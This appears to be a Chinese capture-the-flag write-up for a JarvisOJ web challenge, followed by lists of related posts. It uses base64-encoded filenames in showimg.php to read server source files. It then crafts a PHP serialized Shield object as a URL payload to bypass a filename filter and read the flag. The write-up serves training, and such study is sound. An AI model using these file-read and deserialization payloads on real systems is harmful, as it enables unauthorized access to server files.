题目地址

http://web.jarvisoj.com:32768/

首页是一张图片

查看源码,看到了一些猫腻,showing.php     c2hpZWxkLmpwZw==是base64编码    解码成shield.jpg

我们尝试输入一下,得到了一堆乱码,可以确定是一个文件包含漏洞,可以任意读取服务器文件,文件名用base64加密

尝试读取一下shield.php(c2hpZWxkLnBocA==)

view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
<?php

    $f = $_GET['img'];

    if (!empty($f)) {

        $f = base64_decode($f);

        if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE

        && stripos($f,'pctf')===FALSE) {

            readfile($f);

        } else {

            echo "File not found!";

        }

    }

?>

过滤了切换目录的字符和pctf

之后我们尝试获取index.php的页面   index.php(aW5kZXgucGhw)





view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw






<?php

    require_once('shield.php');

    $x = new Shield();

    isset($_GET['class']) && $g = $_GET['class'];

    if (!empty($g)) {

        $x = unserialize($g);

    }

    echo $x->readfile();

?>




包含shield.php,可以通过get传参的方式,new 一个shield类,然后进行反序列化,那就读取一下shield.php(c2hpZWxkLnBocA==)的内容




http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==






<?php

    //flag is in pctf.php

    class Shield {

        public $file;

        function __construct($filename = '') {

            $this -> file = $filename;

        }

        function readfile() {

            if (!empty($this->file) && stripos($this->file,'..')===FALSE

            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

                return @file_get_contents($this->file);

            }

        }

    }

?>




得到了shield的类的构造函数和方法,还有提示flag在pctf.php   那读取一下pctf.php(cGN0Zi5waHA=)




http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=






没有找到文件,前面过滤掉了pctf,所以不能直接利用,但是定义shield类里面没有进行过滤,我们利用反序列化漏洞,构造一个shield类,且属性file为pctf.php


把上面的序列化代码复制下来,本地跑一下




<?php

    class Shield {

        public $file;

        function __construct($filename = '') {

            $this -> file = $filename;

        }

        function readfile() {

            if (!empty($this->file) && stripos($this->file,'..')===FALSE

            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

                return @file_get_contents($this->file);

            }

        }

    }

     $shield = new Shield('pctf.php');

    echo serialize($shield);

?>





得到本地的结果




然后输入最后的payload




http://web.jarvisoj.com:32768/?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}




因为是被注释的,只能查看源码F12才能找到flag




考察点


文件包含漏洞


反序列化漏洞
												


											
web-神盾局的秘密的更多相关文章
	

    
						
  1. jarvis OJ WEB题目writeup
		
    0x00前言 发现一个很好的ctf平台,题目感觉很有趣,学习了一波并记录一下 https://www.jarvisoj.com 0x01 Port51 题目要求是用51端口去访问该网页,注意下,要用具 ...
    
		
    2. 
						
  2. JarvisOJ平台Web题部分writeup
		
    PORT51 题目链接:http://web.jarvisoj.com:32770/ 这道题本来以为是访问服务器的51号端口,但是想想又不太对,应该是本地的51号端口访问服务器 想着用linux下的c ...
    
		
    3. 
						
  3. 【web  JSP  basePath】basePath的含义
		
    问题1:WEB-INF的问题 今天新创建项目,在JSP中引入外部的JS文件和CSS文件,但是路径一直显示错误: 其中JSP页面引入这几个文件是这么写的: <link rel="styl ...
    
		
    4. 
						
  4. PCTF-2016-WEB
		
    Pctf ** web100 PORT51**  开始看到这个真的无法下手,想过用python–socket编程或者scapy发包.自己觉得是可以的,但是没有去试,后面看一大神writeup,知道:  ...
    
		
    5. 
						
  5. PHP反序列化漏洞研究
		
    序列化 序列化说通俗点就是把一个对象变成可以传输的字符串 php serialize()函数 用于序列化对象或数组,并返回一个字符串.序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结 ...
    
		
    6. 
						
  6. C# (转载)webbrowser专题(参考资料:https://www.cnblogs.com/blogpro/p/11458390.html)
		
    C# .Net 2.0实例学习:WebBrowser页面与WinForm交互技巧 2 Study Case :高亮显示 上一个例子中我们学会了查找文本——究跟到底,对Web页面还是只读不写.那么,如果 ...
    
		
    7. 
						
  7. C# webbrowser专题
		
    C# .Net 2.0实例学习:WebBrowser页面与WinForm交互技巧 2 Study Case :高亮显示 上一个例子中我们学会了查找文本——究跟到底,对Web页面还是只读不写.那么,如果 ...
    
		
    8. 
						
  8. Spring Boot的前世今生以及它和Spring Cloud的关系详解。
		
    要了解Spring Boot的发展背景,还得从2004年Spring Framework1.0版本发布开始说起,不过大家都是从开始学习Java就使用Spring Framework了,所以就不做过多展 ...
    
		
    9. 
						
  9. 【原】移动web点5像素的秘密
		
    最近和一个朋友聊天,朋友吐露了工作上的一些不开心,说自己总是喜欢跟别人比较,活得比较累,这种感觉大部分人经历过,往往觉得是自己心态不好,其实不然,这是人性,此时应该快速摆脱这种状态,想到DOTA大9神 ...
    
		
    10. 
						
  10. 移动web点5像素的秘密
		
    最近和一个朋友聊天,朋友吐露了工作上的一些不开心,说自己总是喜欢跟别人比较,活得比较累,这种感觉大部分人经历过,往往觉得是自己心态不好,其实不然,这是人性,此时应该快速摆脱这种状态,想到DOTA大9神 ...
    
		
    11. 
		

	


随机推荐
	

    
									
  1. Octave移动数据
			
    A=[1 2;3 4;5 6] size(A)   会返回(3,2) length(A)  会返回矩阵的维度   =3 pwd  :查看当前Octave的路径 cd D:/... :改变Octave的 ...
    
			
    2. 
						
  2. Java学习笔记(7)---流(Stream),文件(File)
			
    1.Stream流 a.定义: Java.io 包几乎包含了所有操作输入.输出需要的类.所有这些流类代表了输入源和输出目标. Java.io 包中的流支持很多种格式,比如:基本类型.对象.本地化字符集 ...
    
			
    3. 
						
  3. 从公司实际沟通中-得知bug的描述与为什么要bug留痕
			
    从公司实际沟通中-得知bug的描述与为什么要bug留痕 最近在做的一个实际项目.下图为我们的聊天记录,仔细看图,领悟: 从中预期可以学习到的: 1)实际公司--Bug描述的另一个方法: 2)实际公司- ...
    
			
    4. 
						
  4. MATLAB实例:构造网络连接图(Network Connection)及计算图的代数连通度(Algebraic Connectivity)
			
    MATLAB实例:构造网络连接图(Network Connection)及计算图的代数连通度(Algebraic Connectivity) 作者:凯鲁嘎吉 - 博客园 http://www.cnbl ...
    
			
    5. 
						
  5. 80道最新java基础部分面试题(七)
			
    自己整理的面试题,希望可以帮到大家,需要更多资料的可以私信我哦,大家一起学习进步! 70.TreeSet里面放对象,如果同时放入了父类和子类的实例对象,那比较时使用的是父类的compareTo方法,还 ...
    
			
    6. 
						
  6. 【UOJ276】【清华集训2016】汽水(分数规划+点分治)
			
    点此看题面 大致题意: 给你一棵树,要求你选择一条树上路径,使得这条路径上边权的平均值与定值\(k\)的差的绝对值最小.求出这个最小值. 分数规划 看到平均值,首先就应该想到分数规划吧. 我们二分答案 ...
    
			
    7. 
						
  7. hyper-v简介及安装使用
			
     前言:作为IT界的巨头,微软自己的虚拟化技术,也是微软第一个采用Vmware与CitrixXen一样基于hypervisor的虚拟化技术,有着自己可圈可点的地方,微软自己的虚拟化技术嘛,对windo ...
    
			
    8. 
						
  8. C++入门到理解阶段二基础篇(2)——C++注释、变量、常量、关键字、标识符
			
    目录 1.注释 注释作用 注释的方式 2.变量 变量基本知识 定义变量 3.常量 常量基本知识 整数常量 浮点常量 布尔常量 字符常量 字符串常量 常量定义 使用 #define 预处理器. 使用 c ...
    
			
    9. 
						
  9. 数据库——SQL-SERVER练习(4)  建表及数据完整性
			
    1. 输入下图的语句, 建立学生表STU. CREATE TABLE STU ( SNO NUMERIC() PRIMARY KEY, SNANE CHAR() NOT NULL, SSEX CHAR ...
    
			
    10. 
						
  10. Create an XAF Application  创建一个XAF应用程序
			
    This topic describes how to use the Solution Wizard to create XAF applications and specify a connect ...
    
			
    11.